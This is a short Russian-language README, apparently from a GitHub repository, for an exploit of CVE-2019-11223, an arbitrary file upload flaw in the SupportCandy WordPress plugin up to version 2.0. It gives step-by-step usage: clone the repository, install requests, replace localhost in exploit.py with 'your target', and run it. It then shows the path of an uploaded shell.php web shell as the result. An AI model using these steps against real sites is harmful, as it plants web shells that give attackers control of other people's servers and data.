
CVE-2019-11223 — Произвольная загрузка файлов в плагине Support Candy для WordPress версии ниже 2.0
Произвольная загрузка файлов в плагин Wordpress SupportCandy версии 2.0 и ниже
git clone https://github.com/AngelCtulhu/CVE-2019-11223.git
pip install requests
в exploit.py измените localhost на вашу цель
python exploit.py
"http:\/\/localhost\/wp-content\/uploads\/wpsc\/1555513124_shell.php"
Этот проект лицензирован по лицензии MIT - подробности в файле LICENSE